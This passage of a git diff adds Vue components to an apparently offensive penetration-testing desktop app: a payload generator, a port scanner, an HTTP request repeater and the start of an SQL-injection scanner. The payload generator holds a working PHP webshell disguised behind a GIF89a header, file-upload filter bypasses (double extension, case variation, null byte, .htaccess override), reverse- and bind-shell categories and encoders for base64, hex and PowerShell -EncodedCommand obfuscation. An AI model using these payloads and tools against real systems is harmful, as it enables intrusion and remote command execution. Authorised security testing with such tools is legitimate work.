+  { category: "file-upload", name: "magic bytes + php", lang: "upload", template: `GIF89a\n<?php system($_GET['c']); ?>`, note: "prepend GIF89a to bypass magic byte filter" },
+  { category: "file-upload", name: "double extension", lang: "upload", template: `shell.php.jpg`, note: "some apache configs execute .php.*" },
+  { category: "file-upload", name: "case variation", lang: "upload", template: `shell.pHp`, note: "bypass lowercase extension check" },
+  { category: "file-upload", name: "null byte (old)", lang: "upload", template: `shell.php%00.jpg`, note: "legacy PHP <5.3.4" },
+  { category: "file-upload", name: "htaccess override", lang: "upload", template: `AddType application/x-httpd-php .jpg`, note: "upload .htaccess then .jpg webshell" },
+];
+
+const categories: { id: PayloadTemplate["category"] | "all"; label: string }[] = [
+  { id: "all", label: "all" },
+  { id: "reverse-shell", label: "reverse" },
+  { id: "bind-shell", label: "bind" },
+  { id: "oneliner", label: "oneliner" },
+  { id: "webshell", label: "webshell" },
+  { id: "msfvenom", label: "msfvenom" },
+  { id: "file-upload", label: "upload" },
+];
+
+function interp(t: string): string {
+  return t.replace(/\{LHOST\}/g, lhost.value).replace(/\{LPORT\}/g, lport.value).replace(/\{CMD\}/g, cmd.value);
+}
+
+function b64(t: string): string {
+  return btoa(unescape(encodeURIComponent(t)));
+}
+function urlEnc(t: string): string { return encodeURIComponent(t); }
+function hexEnc(t: string): string {
+  return Array.from(new TextEncoder().encode(t)).map(b => b.toString(16).padStart(2, "0")).join("");
+}
+function psB64(t: string): string {
+  // powershell utf-16le base64 for -EncodedCommand
+  const buf = new Uint8Array(t.length * 2);
+  for (let i = 0; i < t.length; i++) { buf[i * 2] = t.charCodeAt(i); }
+  let bin = "";
+  for (let i = 0; i < buf.length; i++) bin += String.fromCharCode(buf[i]);
+  return btoa(bin);
+}
+
+const filtered = computed(() => {
+  const q = query.value.toLowerCase().trim();
+  return templates.filter(t => {
+    if (activeCategory.value !== "all" && t.category !== activeCategory.value) return false;
+    if (q) {
+      const hay = (t.name + " " + t.lang + " " + t.template).toLowerCase();
+      if (!hay.includes(q)) return false;
+    }
+    return true;
+  });
+});
+
+const toast = ref("");
+async function copyText(t: string) {
+  try {
+    await navigator.clipboard.writeText(t);
+    toast.value = "copied";
+    setTimeout(() => { toast.value = ""; }, 1200);
+  } catch {
+    toast.value = "copy failed";
+    setTimeout(() => { toast.value = ""; }, 1200);
+  }
+}
+
+function langColor(l: string): string {
+  const m: Record<string, string> = {
+    bash: "#4eaa25", sh: "#4eaa25", python: "#3572a5", perl: "#0298c3",
+    ruby: "#701516", php: "#4f5d95", node: "#f1e05a", go: "#00add8",
+    powershell: "#012456", nc: "#7fb3d5", ncat: "#7fb3d5", socat: "#7fb3d5",
+    jsp: "#e76f00", aspx: "#178600", lua: "#000080", awk: "#c1f12e",
+    msfvenom: "#ff2f4a", upload: "#d4a537", windows: "#0078d7",
+  };
+  return m[l] || "#6a6a6a";
+}
+</script>
+
+<template>
+  <div class="module">
+    <div class="form">
+      <div class="row params">
+        <label class="mini"><span>LHOST</span><input v-model="lhost" placeholder="attacker IP" /></label>
+        <label class="mini"><span>LPORT</span><input v-model="lport" placeholder="listener port" /></label>
+        <label class="mini wide"><span>CMD</span><input v-model="cmd" placeholder="id (optional)" /></label>
+      </div>
+
+      <div class="row cats">
+        <button
+          v-for="c in categories"
+          :key="c.id"
+          class="cat-chip"
+          :class="{ on: activeCategory === c.id }"
+          @click="activeCategory = c.id"
+        >{{ c.label }}</button>
+      </div>
+
+      <input v-model="query" class="search-input" placeholder="filter: bash, python, obfus, etc..." spellcheck="false" />
+    </div>
+
+    <div class="pl-list">
+      <div v-if="!filtered.length" class="empty">no payloads match filter</div>
+      <div v-for="(t, i) in filtered" :key="i" class="pl">
+        <div class="pl-head">
+          <span class="pl-name">{{ t.name }}</span>
+          <span class="pl-lang" :style="{ color: langColor(t.lang), borderColor: langColor(t.lang) }">{{ t.lang }}</span>
+          <span class="pl-cat">{{ t.category }}</span>
+        </div>
+        <pre class="pl-body">{{ interp(t.template) }}</pre>
+        <div v-if="t.note" class="pl-note">» {{ t.note }}</div>
+        <div class="pl-actions">
+          <button class="btn-ghost tiny" @click="copyText(interp(t.template))">copy</button>
+          <button class="btn-ghost tiny" @click="copyText(b64(interp(t.template)))" title="base64 encode">b64</button>
+          <button class="btn-ghost tiny" @click="copyText(urlEnc(interp(t.template)))" title="URL encode">url</button>
+          <button class="btn-ghost tiny" @click="copyText(hexEnc(interp(t.template)))" title="hex encode">hex</button>
+          <button v-if="t.lang === 'powershell'" class="btn-ghost tiny" @click="copyText(psB64(interp(t.template)))" title="powershell -EncodedCommand">ps-b64</button>
+        </div>
+      </div>
+    </div>
+
+    <div v-if="toast" class="toast">{{ toast }}</div>
+  </div>
+</template>
+
+<style scoped>
+.params .mini.wide { flex: 1; }
+
+.cats { flex-wrap: wrap; }
+.cat-chip {
+  padding: 3px 10px;
+  border: 1px solid var(--border);
+  background: var(--bg-panel);
+  color: var(--fg-dim);
+  font-size: 10px;
+  text-transform: uppercase;
+  letter-spacing: 0.1em;
+  cursor: pointer;
+}
+.cat-chip:hover { color: var(--fg); }
+.cat-chip.on { color: var(--alert); border-color: var(--alert); background: rgba(255, 47, 74, 0.05); }
+
+.search-input {
+  background: var(--bg-panel);
+  border: 1px solid var(--border);
+  color: var(--fg);
+  padding: 4px 8px;
+  font-size: 12px;
+  font-family: inherit;
+}
+.search-input:focus { border-color: var(--accent); outline: none; }
+
+.pl-list {
+  flex: 1;
+  overflow-y: auto;
+  display: flex;
+  flex-direction: column;
+  gap: 6px;
+  min-height: 0;
+}
+.pl {
+  background: var(--bg-panel);
+  border: 1px solid var(--border);
+  padding: 6px 8px;
+  display: flex;
+  flex-direction: column;
+  gap: 4px;
+}
+.pl:hover { border-color: var(--border-hot); }
+.pl-head { display: flex; gap: 6px; align-items: center; flex-wrap: wrap; }
+.pl-name { color: var(--fg); font-weight: 700; font-size: 12px; }
+.pl-lang {
+  font-size: 9px;
+  padding: 0 5px;
+  border: 1px solid;
+  letter-spacing: 0.1em;
+  text-transform: uppercase;
+}
+.pl-cat {
+  color: var(--fg-ghost);
+  font-size: 9px;
+  text-transform: uppercase;
+  letter-spacing: 0.1em;
+  margin-left: auto;
+}
+.pl-body {
+  background: var(--bg);
+  border: 1px solid var(--border);
+  padding: 5px 8px;
+  font-size: 11px;
+  color: var(--valid);
+  white-space: pre-wrap;
+  word-break: break-all;
+  max-height: 160px;
+  overflow-y: auto;
+  font-family: var(--mono);
+  line-height: 1.4;
+}
+.pl-note {
+  color: var(--info);
+  font-size: 10px;
+  font-style: italic;
+}
+.pl-actions { display: flex; gap: 3px; flex-wrap: wrap; }
+.btn-ghost.tiny { padding: 1px 8px; font-size: 9px; }
+
+.empty {
+  color: var(--fg-ghost);
+  text-align: center;
+  padding: 20px;
+  font-style: italic;
+  font-size: 11px;
+}
+
+.toast {
+  position: absolute;
+  bottom: 20px;
+  left: 50%;
+  transform: translateX(-50%);
+  padding: 4px 12px;
+  background: var(--alert);
+  color: #fff;
+  font-size: 11px;
+  letter-spacing: 0.1em;
+  text-transform: uppercase;
+  animation: toast 1.2s ease-out;
+  pointer-events: none;
+  z-index: 10;
+}
+@keyframes toast {
+  0% { opacity: 0; transform: translate(-50%, 10px); }
+  20%, 80% { opacity: 1; transform: translate(-50%, 0); }
+  100% { opacity: 0; transform: translate(-50%, -10px); }
+}
+</style>
diff --git a/src/components/modules/PortScan.vue b/src/components/modules/PortScan.vue
new file mode 100644
index 0000000..fc1c1f2
--- /dev/null
+++ b/src/components/modules/PortScan.vue
@@ -0,0 +1,208 @@
+<script setup lang="ts">
+import { onMounted, onUnmounted, ref } from "vue";
+import { invoke } from "@tauri-apps/api/core";
+import { listen, type UnlistenFn } from "@tauri-apps/api/event";
+import Terminal from "../Terminal.vue";
+import Prompt from "../Prompt.vue";
+import { useTerminal } from "../../composables/useTerminal";
+
+const target = ref("scanme.nmap.org");
+const portSpec = ref("top1000");
+const concurrency = ref(200);
+const timeoutMs = ref(1500);
+const running = ref(false);
+const progress = ref({ scanned: 0, total: 0 });
+
+const log = useTerminal();
+const unlistens: UnlistenFn[] = [];
+
+function parsePorts(spec: string): number[] | "top1000" {
+  const s = spec.trim();
+  if (s === "" || s === "top1000") return "top1000";
+  if (s === "all") {
+    const arr: number[] = [];
+    for (let i = 1; i <= 65535; i++) arr.push(i);
+    return arr;
+  }
+  const out = new Set<number>();
+  for (const part of s.split(",")) {
+    const p = part.trim();
+    if (p.includes("-")) {
+      const [a, b] = p.split("-").map((x) => parseInt(x, 10));
+      if (!isNaN(a) && !isNaN(b)) for (let i = a; i <= b; i++) out.add(i);
+    } else {
+      const n = parseInt(p, 10);
+      if (!isNaN(n)) out.add(n);
+    }
+  }
+  return Array.from(out);
+}
+
+const TOP_1000 = ref<number[]>([]);
+
+onMounted(async () => {
+  try {
+    TOP_1000.value = await invoke<number[]>("default_ports");
+  } catch {
+    TOP_1000.value = [21, 22, 80, 443, 3306, 3389, 8080];
+  }
+});
+
+async function run() {
+  if (running.value) return;
+  running.value = true;
+  log.clear();
+  progress.value = { scanned: 0, total: 0 };
+
+  const parsed = parsePorts(portSpec.value);
+  const ports = parsed === "top1000" ? TOP_1000.value : parsed;
+
+  log.info(`target: ${target.value}`);
+  log.info(`ports: ${ports.length} | concurrency: ${concurrency.value} | timeout: ${timeoutMs.value}ms`);
+  log.dim("resolving...");
+
+  unlistens.push(
+    await listen<{ scanned: number; total: number }>("portscan:progress", (e) => {
+      progress.value = e.payload;
+    })
+  );
+  unlistens.push(
+    await listen<{ port: number; service: string | null }>("portscan:hit", (e) => {
+      const s = e.payload.service ? ` (${e.payload.service})` : "";
+      log.valid(`open  ${String(e.payload.port).padEnd(5)}/tcp${s}`);
+    })
+  );
+
+  try {
+    const results: Array<{ port: number; service: string | null }> = await invoke("port_scan", {
+      req: { target: target.value, ports, concurrency: concurrency.value, timeout_ms: timeoutMs.value },
+    });
+    log.ok(`scan complete: ${results.length} open port(s)`);
+  } catch (e: any) {
+    log.err(String(e));
+  } finally {
+    running.value = false;
+    cleanup();
+  }
+}
+
+function cleanup() {
+  while (unlistens.length) {
+    const u = unlistens.pop();
+    if (u) u();
+  }
+}
+
+onUnmounted(cleanup);
+</script>
+
+<template>
+  <div class="module">
+    <div class="form">
+      <Prompt label="target" v-model="target" placeholder="host or IP" />
+      <Prompt label="ports" v-model="portSpec" placeholder="top1000 | 1-1024 | 22,80,443 | all" />
+      <div class="row">
+        <label class="mini">
+          <span>conc</span>
+          <input v-model.number="concurrency" type="number" min="1" max="2000" />
+        </label>
+        <label class="mini">
+          <span>timeout</span>
+          <input v-model.number="timeoutMs" type="number" min="100" max="10000" />
+        </label>
+        <button class="exec" :disabled="running" @click="run">
+          {{ running ? "[ scanning... ]" : "> execute" }}
+        </button>
+      </div>
+      <div v-if="progress.total" class="bar">
+        <div class="bar-fill" :style="{ width: (progress.scanned / progress.total) * 100 + '%' }" />
+        <span class="bar-text">{{ progress.scanned }} / {{ progress.total }}</span>
+      </div>
+    </div>
+    <Terminal :lines="log.lines.value" title="port-scan // output" @clear="log.clear()" />
+  </div>
+</template>
+
+<style scoped>
+.module {
+  display: flex;
+  flex-direction: column;
+  gap: 10px;
+  height: 100%;
+  min-height: 0;
+}
+.form {
+  display: flex;
+  flex-direction: column;
+  gap: 6px;
+}
+.row {
+  display: flex;
+  gap: 6px;
+  align-items: stretch;
+}
+.mini {
+  display: flex;
+  align-items: center;
+  gap: 4px;
+  border: 1px solid var(--border);
+  padding: 4px 8px;
+  background: var(--bg-panel);
+}
+.mini span {
+  color: var(--fg-dim);
+  font-size: 10px;
+  text-transform: uppercase;
+  letter-spacing: 0.1em;
+}
+.mini input {
+  width: 60px;
+  color: var(--fg);
+  text-align: right;
+}
+.exec {
+  flex: 1;
+  border: 1px solid var(--accent);
+  color: var(--accent);
+  background: transparent;
+  padding: 6px 12px;
+  font-weight: 500;
+  letter-spacing: 0.05em;
+  text-transform: lowercase;
+  transition: all 0.15s;
+}
+.exec:hover:not(:disabled) {
+  background: var(--alert);
+  color: #fff;
+  border-color: var(--alert);
+  box-shadow: 0 0 16px rgba(255, 47, 74, 0.35);
+}
+.exec:disabled {
+  color: var(--fg-dim);
+  border-color: var(--border-hot);
+  cursor: wait;
+}
+.bar {
+  position: relative;
+  height: 14px;
+  background: var(--bg-panel);
+  border: 1px solid var(--border);
+  overflow: hidden;
+}
+.bar-fill {
+  height: 100%;
+  background: linear-gradient(90deg, var(--accent-dim), var(--accent));
+  transition: width 0.1s linear;
+}
+.bar-text {
+  position: absolute;
+  inset: 0;
+  display: flex;
+  align-items: center;
+  justify-content: center;
+  font-size: 10px;
+  color: var(--fg);
+  mix-blend-mode: difference;
+  letter-spacing: 0.1em;
+}
+</style>
diff --git a/src/components/modules/Repeater.vue b/src/components/modules/Repeater.vue
new file mode 100644
index 0000000..76bb47a
--- /dev/null
+++ b/src/components/modules/Repeater.vue
@@ -0,0 +1,477 @@
+<script setup lang="ts">
+import { computed, onMounted, ref } from "vue";
+import { invoke } from "@tauri-apps/api/core";
+
+interface RepeaterResp {
+  status: number;
+  status_text: string;
+  http_version: string;
+  headers: [string, string][];
+  body: string;
+  body_len: number;
+  content_type?: string;
+  time_ms: number;
+  final_url: string;
+  redirected: boolean;
+  is_text: boolean;
+}
+
+interface HistoryItem {
+  ts: number;
+  method: string;
+  url: string;
+  headers_raw: string;
+  body: string;
+  status?: number;
+  time_ms?: number;
+}
+
+const method = ref("GET");
+const url = ref("https://example.com/");
+const headersRaw = ref("User-Agent: Mozilla/5.0 (PocketPentester)\nAccept: */*");
+const body = ref("");
+const followRedirects = ref(false);
+const ignoreTls = ref(true);
+const timeoutMs = ref(15000);
+const sending = ref(false);
+const resp = ref<RepeaterResp | null>(null);
+const err = ref("");
+const history = ref<HistoryItem[]>([]);
+const tab = ref<"body" | "preview" | "headers" | "curl">("body");
+const curlText = ref("");
+
+const methods = ["GET", "POST", "PUT", "PATCH", "DELETE", "HEAD", "OPTIONS"];
+
+function parseHeaders(): Record<string, string> {
+  const out: Record<string, string> = {};
+  for (const line of headersRaw.value.split("\n")) {
+    const idx = line.indexOf(":");
+    if (idx === -1) continue;
+    const k = line.slice(0, idx).trim();
+    const v = line.slice(idx + 1).trim();
+    if (k) out[k] = v;
+  }
+  return out;
+}
+
+const payload = computed(() => ({
+  method: method.value,
+  url: url.value,
+  headers: parseHeaders(),
+  body: body.value || null,
+  timeout_ms: timeoutMs.value,
+  follow_redirects: followRedirects.value,
+  ignore_tls: ignoreTls.value,
+}));
+
+const previewKind = computed<"html" | "json" | "xml" | "image" | "text" | "none">(() => {
+  const r = resp.value;
+  if (!r) return "none";
+  const ct = (r.content_type ?? "").toLowerCase();
+  if (ct.includes("html") || r.body.trim().startsWith("<!DOCTYPE") || r.body.trim().startsWith("<html")) return "html";
+  if (ct.includes("json") || (r.body.trim().startsWith("{") || r.body.trim().startsWith("["))) return "json";
+  if (ct.includes("xml") || r.body.trim().startsWith("<?xml")) return "xml";
+  if (ct.startsWith("image/")) return "image";
+  return "text";
+});
+
+const prettyBody = computed(() => {
+  const r = resp.value;
+  if (!r) return "";
+  try {
+    if (previewKind.value === "json") {
+      return JSON.stringify(JSON.parse(r.body), null, 2);
+    }
+    if (previewKind.value === "xml") {
+      return prettyXml(r.body);
+    }
+  } catch {}
+  return r.body;
+});
+
+function prettyXml(xml: string): string {
+  let formatted = "";
+  let indent = 0;
+  const nodes = xml.replace(/(>)(<)(\/*)/g, "$1\n$2$3").split("\n");
+  for (const line of nodes) {
+    const t = line.trim();
+    if (!t) continue;
+    if (t.match(/^<\/.+>/)) indent = Math.max(0, indent - 1);
+    formatted += "  ".repeat(indent) + t + "\n";
+    if (t.match(/^<[^/!?][^>]*[^/]>$/) && !t.match(/<.+<\/.+>/)) indent++;
+  }
+  return formatted;
+}
+
+function isSafeBody(b: string): boolean {
+  // limit preview to 2MB to avoid browser lag
+  return b.length < 2_000_000;
+}
+
+async function send() {
+  if (sending.value) return;
+  sending.value = true;
+  err.value = "";
+  resp.value = null;
+  try {
+    resp.value = await invoke<RepeaterResp>("repeater_send", { req: payload.value });
+    tab.value = "body";
+    pushHistory(resp.value);
+  } catch (e: any) {
+    err.value = String(e);
+  } finally {
+    sending.value = false;
+  }
+}
+
+function pushHistory(r: RepeaterResp) {
+  const item: HistoryItem = {
+    ts: Date.now(),
+    method: method.value,
+    url: url.value,
+    headers_raw: headersRaw.value,
+    body: body.value,
+    status: r.status,
+    time_ms: r.time_ms,
+  };
+  history.value.unshift(item);
+  if (history.value.length > 30) history.value.pop();
+  localStorage.setItem("repeater:history", JSON.stringify(history.value));
+}
+
+function loadHistory(h: HistoryItem) {
+  method.value = h.method;
+  url.value = h.url;
+  headersRaw.value = h.headers_raw;
+  body.value = h.body;
+}
+
+async function buildCurl() {
+  try {
+    curlText.value = await invoke<string>("repeater_to_curl", { req: payload.value });
+    tab.value = "curl";
+  } catch (e: any) {
+    err.value = String(e);
+  }
+}
+
+async function copyTo(text: string) {
+  try { await navigator.clipboard.writeText(text); } catch {}
+}
+
+function statusClass(s: number) {
+  if (s >= 200 && s < 300) return "s-2xx";
+  if (s >= 300 && s < 400) return "s-3xx";
+  if (s >= 400 && s < 500) return "s-4xx";
+  return "s-5xx";
+}
+
+function fmtBytes(n: number) {
+  if (n < 1024) return `${n} B`;
+  if (n < 1024 * 1024) return `${(n / 1024).toFixed(1)} KB`;
+  return `${(n / 1024 / 1024).toFixed(2)} MB`;
+}
+
+onMounted(() => {
+  try { history.value = JSON.parse(localStorage.getItem("repeater:history") || "[]"); } catch {}
+});
+</script>
+
+<template>
+  <div class="module">
+    <div class="req-row">
+      <select v-model="method" class="method-sel">
+        <option v-for="m in methods" :key="m">{{ m }}</option>
+      </select>
+      <input v-model="url" class="url-input" placeholder="https://target.com/path" spellcheck="false" />
+    </div>
+
+    <div class="row">
+      <label class="toggle"><input type="checkbox" v-model="followRedirects" /><span>follow</span></label>
+      <label class="toggle"><input type="checkbox" v-model="ignoreTls" /><span>ignore-tls</span></label>
+      <label class="mini"><span>t/out</span><input v-model.number="timeoutMs" type="number" min="1000" max="120000" /></label>
+      <button class="btn-ghost curl-btn" @click="buildCurl">→ curl</button>
+    </div>
+
+    <button class="exec send-btn" :disabled="sending" @click="send">{{ sending ? "[ sending... ]" : "▸ SEND" }}</button>
+
+    <div class="split">
+      <div class="pane">
+        <div class="pane-head">request</div>
+        <label class="ta">
+          <span class="lbl">headers (Key: Value per line)</span>
+          <textarea class="term-input" v-model="headersRaw" rows="4" spellcheck="false" />
+        </label>
+        <label class="ta">
+          <span class="lbl">body</span>
+          <textarea class="term-input body-area" v-model="body" rows="6" spellcheck="false" placeholder='{"k":"v"} or form data' />
+        </label>
+      </div>
+
+      <div class="pane">
+        <div class="pane-head">response</div>
+
+        <div v-if="err" class="err-box">{{ err }}</div>
+
+        <div v-else-if="resp" class="resp-wrap">
+          <div class="resp-meta">
+            <span class="stat-badge" :class="statusClass(resp.status)">{{ resp.status }} {{ resp.status_text }}</span>
+            <span class="resp-time">{{ resp.time_ms }}ms</span>
+            <span class="resp-size">{{ fmtBytes(resp.body_len) }}</span>
+            <span v-if="resp.redirected" class="resp-redirect">→ redirected</span>
+            <button class="btn-ghost tiny" @click="copyTo(resp!.body)">copy body</button>
+          </div>
+          <div class="tabs-mini">
+            <button :class="{ on: tab === 'body' }" @click="tab = 'body'">body</button>
+            <button :class="{ on: tab === 'preview' }" @click="tab = 'preview'">
+              preview <span class="kind-tag">[{{ previewKind }}]</span>
+            </button>
+            <button :class="{ on: tab === 'headers' }" @click="tab = 'headers'">headers ({{ resp.headers.length }})</button>
+            <button :class="{ on: tab === 'curl' }" @click="tab = 'curl'" :disabled="!curlText">curl</button>
+          </div>
+
+          <pre v-if="tab === 'body'" class="body-view">{{ resp.is_text ? resp.body : "[binary response — " + fmtBytes(resp.body_len) + "]" }}</pre>
+
+          <div v-else-if="tab === 'preview'" class="preview-wrap">
+            <iframe
+              v-if="previewKind === 'html' && isSafeBody(resp.body)"
+              class="html-frame"
+              :srcdoc="resp.body"
+              sandbox="allow-same-origin"
+              referrerpolicy="no-referrer"
+            ></iframe>
+            <pre v-else-if="previewKind === 'json'" class="body-view json-view">{{ prettyBody }}</pre>
+            <pre v-else-if="previewKind === 'xml'" class="body-view xml-view">{{ prettyBody }}</pre>
+            <div v-else-if="previewKind === 'image'" class="preview-msg">image/binary content — preview unavailable (response was read as text)</div>
+            <div v-else-if="!isSafeBody(resp.body)" class="preview-msg">response too large to preview safely ({{ fmtBytes(resp.body_len) }}) — use body tab</div>
+            <div v-else class="preview-msg">no structured preview for this content-type — showing plain text</div>
+          </div>
+
+          <div v-else-if="tab === 'headers'" class="hdr-list">
+            <div v-for="[k, v] in resp.headers" :key="k + v" class="hdr-item">
+              <span class="hdr-k">{{ k }}</span>
+              <span class="hdr-v">{{ v }}</span>
+            </div>
+          </div>
+          <pre v-else-if="tab === 'curl'" class="body-view curl-view">{{ curlText }}</pre>
+        </div>
+
+        <div v-else class="placeholder">no response yet — hit SEND</div>
+      </div>
+    </div>
+
+    <details class="adv">
+      <summary>history · {{ history.length }}</summary>
+      <div class="hist-list">
+        <div v-if="!history.length" class="placeholder">no history yet</div>
+        <div v-for="(h, i) in history" :key="i" class="hist-row" @click="loadHistory(h)">
+          <span class="h-method">{{ h.method }}</span>
+          <span v-if="h.status" class="stat-badge tiny" :class="statusClass(h.status)">{{ h.status }}</span>
+          <span class="h-url">{{ h.url }}</span>
+          <span class="h-time">{{ h.time_ms }}ms</span>
+        </div>
+      </div>
+    </details>
+  </div>
+</template>
+
+<style scoped>
+.req-row {
+  display: flex;
+  gap: 4px;
+  align-items: stretch;
+  min-width: 0;
+  width: 100%;
+}
+.method-sel {
+  background: var(--bg-panel);
+  border: 1px solid var(--alert);
+  color: var(--alert);
+  padding: 4px 8px;
+  font-weight: 700;
+  font-size: 12px;
+  font-family: inherit;
+  flex: 0 0 auto;
+  min-width: 80px;
+}
+.method-sel option { background: var(--bg); color: var(--fg); }
+.url-input {
+  flex: 1 1 auto;
+  background: var(--bg-panel);
+  border: 1px solid var(--border);
+  color: var(--fg);
+  padding: 4px 8px;
+  font-size: 12px;
+  min-width: 0;
+}
+.url-input:focus { border-color: var(--accent); outline: none; }
+
+.send-btn {
+  flex: 0 0 auto;
+  padding: 8px 12px;
+  font-size: 13px;
+  font-weight: 700;
+  letter-spacing: 0.2em;
+  text-transform: uppercase;
+  width: 100%;
+  min-width: 0;
+  height: auto;
+}
+.exec.small { padding: 4px 14px; font-size: 12px; font-weight: 700; letter-spacing: 0.1em; }
+.curl-btn { margin-left: auto; }
+
+.split {
+  display: grid;
+  grid-template-columns: 1fr 1fr;
+  gap: 6px;
+  min-height: 0;
+  flex: 1;
+}
+.pane {
+  display: flex;
+  flex-direction: column;
+  gap: 4px;
+  border: 1px solid var(--border);
+  background: var(--bg-panel);
+  padding: 6px;
+  min-width: 0;
+  min-height: 0;
+}
+.pane-head {
+  font-size: 10px;
+  color: var(--fg-dim);
+  text-transform: uppercase;
+  letter-spacing: 0.15em;
+  border-bottom: 1px solid var(--border);
+  padding-bottom: 3px;
+}
+.body-area { min-height: 90px; }
+
+.resp-wrap { display: flex; flex-direction: column; gap: 6px; min-height: 0; flex: 1; }
+.resp-meta { display: flex; gap: 6px; align-items: center; flex-wrap: wrap; font-size: 11px; }
+.stat-badge {
+  padding: 1px 6px;
+  font-weight: 700;
+  border: 1px solid;
+  font-size: 10px;
+  letter-spacing: 0.05em;
+}
+.stat-badge.tiny { padding: 0 4px; font-size: 9px; }
+.s-2xx { color: var(--valid); border-color: var(--valid); background: rgba(92, 217, 130, 0.07); }
+.s-3xx { color: var(--info); border-color: var(--info); }
+.s-4xx { color: var(--warn); border-color: var(--warn); }
+.s-5xx { color: var(--alert); border-color: var(--alert); }
+.resp-time, .resp-size { color: var(--fg-dim); font-size: 10px; font-variant-numeric: tabular-nums; }
+.resp-redirect { color: var(--info); font-size: 10px; }
+.btn-ghost.tiny { padding: 1px 6px; font-size: 9px; margin-left: auto; }
+
+.tabs-mini { display: flex; border-bottom: 1px solid var(--border); }
+.tabs-mini button {
+  padding: 3px 10px;
+  color: var(--fg-dim);
+  font-size: 10px;
+  text-transform: uppercase;
+  letter-spacing: 0.1em;
+  background: transparent;
+  border: none;
+  border-bottom: 2px solid transparent;
+}
+.tabs-mini button.on { color: var(--alert); border-bottom-color: var(--alert); }
+.tabs-mini button:disabled { opacity: 0.4; cursor: not-allowed; }
+
+.body-view {
+  background: var(--bg);
+  border: 1px solid var(--border);
+  padding: 6px 8px;
+  font-size: 11px;
+  color: var(--fg);
+  overflow: auto;
+  max-height: 280px;
+  white-space: pre-wrap;
+  word-break: break-all;
+  font-family: var(--mono);
+  line-height: 1.4;
+}
+.curl-view { color: var(--valid); white-space: pre-wrap; }
+.json-view { color: var(--info); }
+.xml-view { color: var(--warn); }
+.kind-tag { color: var(--fg-ghost); font-size: 8px; margin-left: 2px; }
+
+.preview-wrap {
+  background: var(--bg);
+  border: 1px solid var(--border);
+  max-height: 320px;
+  overflow: hidden;
+  display: flex;
+}
+.html-frame {
+  width: 100%;
+  min-height: 280px;
+  border: none;
+  background: #fff;
+}
+.preview-msg {
+  padding: 20px;
+  color: var(--fg-ghost);
+  font-size: 11px;
+  text-align: center;
+  font-style: italic;
+  width: 100%;
+}
+
+.hdr-list {
+  max-height: 280px;
+  overflow-y: auto;
+  border: 1px solid var(--border);
+  background: var(--bg);
+}
+.hdr-item {
+  display: flex;
+  gap: 6px;
+  padding: 2px 6px;
+  font-size: 10px;
+  border-bottom: 1px solid var(--border);
+}
+.hdr-item:last-child { border: none; }
+.hdr-k { color: var(--info); flex-shrink: 0; min-width: 0; max-width: 200px; text-overflow: ellipsis; overflow: hidden; white-space: nowrap; }
+.hdr-v { color: var(--fg-dim); word-break: break-all; }
+
+.err-box {
+  padding: 8px;
+  color: var(--alert);
+  border: 1px solid var(--alert);
+  background: rgba(255, 47, 74, 0.05);
+  font-size: 11px;
+  word-break: break-all;
+}
+
+.placeholder {
+  color: var(--fg-ghost);
+  font-size: 11px;
+  text-align: center;
+  padding: 20px;
+  font-style: italic;
+}
+
+.adv { border: 1px solid var(--border); background: var(--bg-panel); padding: 4px 8px; }
+.adv summary { cursor: pointer; font-size: 10px; color: var(--fg-dim); text-transform: uppercase; letter-spacing: 0.1em; }
+.hist-list { display: flex; flex-direction: column; gap: 2px; margin-top: 6px; max-height: 200px; overflow-y: auto; }
+.hist-row {
+  display: flex;
+  gap: 6px;
+  align-items: center;
+  padding: 3px 6px;
+  font-size: 11px;
+  cursor: pointer;
+  border: 1px solid transparent;
+}
+.hist-row:hover { border-color: var(--border-hot); background: var(--bg); }
+.h-method { color: var(--alert); font-weight: 700; min-width: 50px; }
+.h-url { flex: 1; color: var(--fg-dim); overflow: hidden; text-overflow: ellipsis; white-space: nowrap; min-width: 0; }
+.h-time { color: var(--fg-ghost); font-size: 9px; }
+
+@media (max-width: 640px) {
+  .split { grid-template-columns: 1fr; }
+  .body-view, .hdr-list { max-height: 200px; }
+}
+</style>
diff --git a/src/components/modules/Sqli.vue b/src/components/modules/Sqli.vue
new file mode 100644
index 0000000..24ad13d
--- /dev/null
+++ b/src/components/modules/Sqli.vue
@@ -0,0 +1,334 @@
+<script setup lang="ts">
+import { onUnmounted, ref } from "vue";
+import { invoke } from "@tauri-apps/api/core";
+import { listen, type UnlistenFn } from "@tauri-apps/api/event";
+import Terminal from "../Terminal.vue";
+import Prompt from "../Prompt.vue";
+import { useTerminal } from "../../composables/useTerminal";
+
+interface Finding {
+  param: string;
+  location: string;
+  technique: string;
+  dbms?: string;
+  prefix: string;
+  suffix: string;
+  payload: string;
+  full_payload: string;
+  evidence: string;
+  confidence: string;
+  extracted: Record<string, string>;
+}
+
+const url = ref("https://target.com/item.php?id=1");
+const method = ref("GET");
+const body = ref("");
+const headersRaw = ref("");
+const cookies = ref("");
+const paramsFilter = ref("");
+
+const tHeuristic = ref(true);
+const tError = ref(true);
+const tBoolean = ref(true);
+const tUnion = ref(true);
+const tTime = ref(false);
+
+const level = ref(2);
+const risk = ref(1);
+const stopOnFirst = ref(true);
+const autoExtract = ref(true);
+const followRedirects = ref(true);
+
+const tamperRandomcase = ref(false);
+const tamperSpace2comment = ref(false);
+const tamperEqualToLike = ref(false);
+
+const concurrency = ref(4);
+const timeoutMs = ref(15000);
+const running = ref(false);
+const findings = ref<Finding[]>([]);
+const log = useTerminal();
+const unlistens: UnlistenFn[] = [];
+
+function parseHeaders(): Record<string, string> {
+  const out: Record<string, string> = {};
+  for (const line of headersRaw.value.split("\n")) {
+    const i = line.indexOf(":");
+    if (i === -1) continue;
+    const k = line.slice(0, i).trim();
+    const v = line.slice(i + 1).trim();
+    if (k) out[k] = v;
+  }
+  return out;
+}
+
+async function run() {
+  if (running.value) return;
+  running.value = true;
+  findings.value = [];
+  log.clear();
+
+  const techniques: string[] = [];
+  if (tHeuristic.value) techniques.push("heuristic");
+  if (tError.value) techniques.push("error");
+  if (tBoolean.value) techniques.push("boolean");
+  if (tUnion.value) techniques.push("union");
+  if (tTime.value) techniques.push("time");
+  if (!techniques.length) { log.err("pick at least one technique"); running.value = false; return; }
+
+  const tamper: string[] = [];
+  if (tamperRandomcase.value) tamper.push("randomcase");
+  if (tamperSpace2comment.value) tamper.push("space2comment");
+  if (tamperEqualToLike.value) tamper.push("equaltolike");
+
+  const params = paramsFilter.value.split(/[\s,]+/).map(s => s.trim()).filter(Boolean);
+
+  log.info(`target: ${method.value} ${url.value}`);
